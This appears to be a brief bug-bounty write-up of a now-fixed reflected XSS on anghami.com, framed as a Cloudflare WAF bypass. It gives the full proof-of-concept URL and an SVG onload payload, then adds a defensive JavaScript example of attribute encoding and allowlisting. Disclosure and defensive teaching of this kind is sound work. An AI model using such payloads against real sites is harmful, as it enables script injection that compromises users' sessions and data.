HOW I BYPASSED CLOUDFLARE WAF

credit: cyberploit

Hey guys, I was doing penetration testing for a private company. I am used to manual testing instead of tools. At that time, the company was using Cloudflare WAF. As a penetration tester, you feel like your inputs are not working and you haven't found a single bug. Your inputs are going to be blocked by the WAF.

XSS at anghami.com

I found XSS at anghami.com. Here are the details.

Report link: https://www.openbugbounty.org/reports/927326/

Affected page: https://anghami.com/openapp/?deeplink=anghami://song/45651752

PoC: https://www.anghami.com/openapp/?deeplink=anghami://song/45651752">xxx<svg%2Fonload%3Dconfirm%28%2Fzikads%2F%29>

My payload: ">xxx<svg%2Fonload%3Dconfirm%28%2Fzikads%2F%29>

The bug has been fixed. What did I get? One month of subscription, worth about $1, as the bounty 😀
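As an added illustration (not code from the report above or from the site), the snippet below shows why the quoted payload breaks out of an HTML attribute that reflects the `deeplink` value, and how output encoding plus a scheme allowlist neutralises it. The page markup, the function names and the `anghami://` allowlist rule are assumptions.

```javascript
// Added illustration, not the original report's code: a reflected "deeplink"
// value dropped into an HTML attribute, beside a hardened renderer.
// The markup below is a constructed stand-in for the real page.

// URL-decoded form of the payload quoted in the report.
const REPORTED_PAYLOAD = '">xxx<svg/onload=confirm(/zikads/)>';

// Vulnerable: the raw parameter is interpolated into an attribute value,
// so a leading quote closes the attribute and the rest becomes markup.
function renderUnsafe(deeplink) {
  return `<a id="open" href="${deeplink}">Open in app</a>`;
}

// Contextual output encoding for an HTML attribute value: the five
// characters that can end the value or start a tag are entity-encoded.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: encode on output and (assumption) accept only the app's own
// scheme with a restricted character set; anything else falls back to "/".
function renderSafe(deeplink) {
  if (!/^anghami:\/\/[A-Za-z0-9/_-]+$/.test(deeplink)) {
    return '<a id="open" href="/">Open in app</a>';
  }
  return `<a id="open" href="${encodeAttr(deeplink)}">Open in app</a>`;
}

// Detection helper: count opening tags in the rendered fragment. A reflected
// value that yields more than the single <a> has broken out of the attribute.
function tagCount(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Stand-alone demo.
console.log('unsafe tags:', tagCount(renderUnsafe(REPORTED_PAYLOAD)));
console.log('safe tags:  ', tagCount(renderSafe(REPORTED_PAYLOAD)));
```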